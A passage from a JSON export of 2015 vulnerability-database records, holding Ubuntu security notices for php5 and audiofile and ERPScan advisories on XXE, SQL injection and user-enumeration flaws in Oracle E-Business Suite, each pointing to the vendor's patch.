"CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "description": "Quarterly update closes 140 vulnerabilities in different applications.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2786-1\r\nOctober 28, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nPHP could be made to crash if it processed a specially crafted file.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nIt was discovered that the PHP phar extension incorrectly handled certain\r\nfiles. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service. &#40;CVE-2015-7803, CVE-2015-7804&#41;\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libapache2-mod-php5 5.6.11+dfsg-1ubuntu3.1\r\n php5-cgi 5.6.11+dfsg-1ubuntu3.1\r\n php5-cli 5.6.11+dfsg-1ubuntu3.1\r\n php5-fpm 5.6.11+dfsg-1ubuntu3.1\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.4\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.4\r\n php5-cli 5.6.4+dfsg-4ubuntu6.4\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.4\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.14\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.14\r\n php5-cli 5.5.9+dfsg-1ubuntu4.14\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.14\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.21\r\n php5-cgi 5.3.10-1ubuntu3.21\r\n php5-cli 5.3.10-1ubuntu3.21\r\n php5-fpm 5.3.10-1ubuntu3.21\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2786-1\r\n CVE-2015-7803, CVE-2015-7804\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.11+dfsg-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.4\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.14\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.21\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32651", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32651", "title": "[USN-2786-1] PHP vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4849"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - XXE injection\r\nAdvisory ID: [ERPSCAN-15-029]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 21.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4849\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector &#40;Related exploit range&#41; Network &#40;N&#41;\r\nAC : Access Complexity &#40;Required attack complexity&#41; Medium &#40;M&#41;\r\nAu : Authentication &#40;Level of authentication needed to exploit&#41; None &#40;N&#41;\r\nC : Impact to Confidentiality Partial &#40;P&#41;\r\nI : Impact to Integrity Partial &#40;P&#41;\r\nA : Impact to Availability Partial &#40;P&#41;\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1&#41; An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2&#41; An attacker can perform a DoS attack &#40;for example, XML Entity Expansion&#41;.\r\n3&#41; An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin &#40;ERPScan&#41;\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/IspPunchInServlet\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions &#40;200 of them just in SAP!&#41;.\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities &#40;TOP 10 Web Hacking Techniques 2012&#41; and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32654", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32654", "title": "[ERPSCAN-15-029] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "PHAR extension DoS.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14753", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14753", "title": "PHP security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4846"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite SQL injection\r\nAdvisory ID: [ERPSCAN-15-026]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: SQL injection\r\nImpact: SQL injection, RCE\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4846\r\nCVSS Information\r\nCVSS Base Score: 3.6 / 10\r\nAV : Access Vector &#40;Related exploit range&#41; Network &#40;N&#41;\r\nAC : Access Complexity &#40;Required attack complexity&#41; High &#40;H&#41;\r\nAu : Authentication &#40;Level of authentication needed to exploit&#41; Single &#40;S&#41;\r\nC : Impact to Confidentiality Partial &#40;P&#41;\r\nI : Impact to Integrity Partial &#40;P&#41;\r\nA : Impact to Availability None &#40;N&#41;\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThe problem is caused by an SQL injection vulnerability. The code\r\ncomprises an SQL statement that contains strings that can be altered\r\nby an attacker. The manipulated SQL statement can then be used to\r\nretrieve additional data from the database or to modify the data.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3, 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov &#40;ERPScan&#41;\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nOne of SQL extensions &#40;afamexts.sql&#41; does not filter user input values\r\nwhich may lead to SQL injection. The only defense mechanism is a\r\npassword for APPS. If an attacker knows the password &#40;for example,\r\ndefault password APPS/APPS&#41;, he will be able to exploit SQL injection\r\nwith high privilege.\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions &#40;200 of them just in SAP!&#41;.\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities &#40;TOP 10 Web Hacking Techniques 2012&#41; and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32657", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32657", "title": "[ERPSCAN-15-026] Oracle E-Business Suite - SQL injection Vulnerability", "type": "securityvulns", "cvss": {"score": 3.6, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4886"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-028]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4886\r\nCVSS Information\r\nCVSS Base Score: 6.4 / 10\r\nAV : Access Vector &#40;Related exploit range&#41; Network &#40;N&#41;\r\nAC : Access Complexity &#40;Required attack complexity&#41; Low &#40;L&#41;\r\nAu : Authentication &#40;Level of authentication needed to exploit&#41; None &#40;N&#41;\r\nC : Impact to Confidentiality Partial &#40;P&#41;\r\nI : Impact to Integrity Partial &#40;P&#41;\r\nA : Impact to Availability None &#40;N&#41;\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1&#41; An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2&#41; An attacker can perform a DoS attack &#40;for example, XML Entity Expansion&#41;.\r\n3&#41; An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin &#40;ERPScan&#41;\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/copxml\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions &#40;200 of them just in SAP!&#41;.\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities &#40;TOP 10 Web Hacking Techniques 2012&#41; and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32653", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32653", "title": "[ERPSCAN-15-028] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4845"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - Database user enumeration\r\nAdvisory ID: [ERPSCAN-15-025]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nDate published:20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: User Enumeration\r\nImpact: user enumeration, SSRF\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4845\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector &#40;Related exploit range&#41; Network &#40;N&#41;\r\nAC : Access Complexity &#40;Required attack complexity&#41; Medium &#40;M&#41;\r\nAu : Authentication &#40;Level of authentication needed to exploit&#41; None &#40;N&#41;\r\nC : Impact to Confidentiality Partial &#40;P&#41;\r\nI : Impact to Integrity None &#40;N&#41;\r\nA : Impact to Availability None &#40;N&#41;\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThere is a script in EBS that is used to connect to the database and\r\ndisplays the connection status. Different connection results can help\r\nan attacker to find existing database accounts.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.2.4\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov &#40;ERPScan&#41;\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nDatabase users enumeration\r\nVunerable script: Aoljtest.js\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions &#40;200 of them just in SAP!&#41;.\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities &#40;TOP 10 Web Hacking Techniques 2012&#41; and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32656", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32656", "title": "[ERPSCAN-15-025] Oracle E-Business Suite Database user enumeration Vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2787-1\r\nOctober 28, 2015\r\n\r\naudiofile vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\naudiofile could be made to crash or run programs as your login if it\r\nopened a specially crafted file.\r\n\r\nSoftware Description:\r\n- audiofile: Open-source version of the SGI audiofile library\r\n\r\nDetails:\r\n\r\nFabrizio Gennari discovered that audiofile incorrectly handled changing\r\nboth the sample format and the number of channels. If a user or automated\r\nsystem were tricked into processing a specially crafted file, audiofile\r\ncould be made to crash, leading to a denial of service, or possibly execute\r\narbitrary code.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libaudiofile1 0.3.6-2ubuntu0.15.10.1\r\n\r\nUbuntu 15.04:\r\n libaudiofile1 0.3.6-2ubuntu0.15.04.1\r\n\r\nUbuntu 14.04 LTS:\r\n libaudiofile1 0.3.6-2ubuntu0.14.04.1\r\n\r\nUbuntu 12.04 LTS:\r\n libaudiofile1 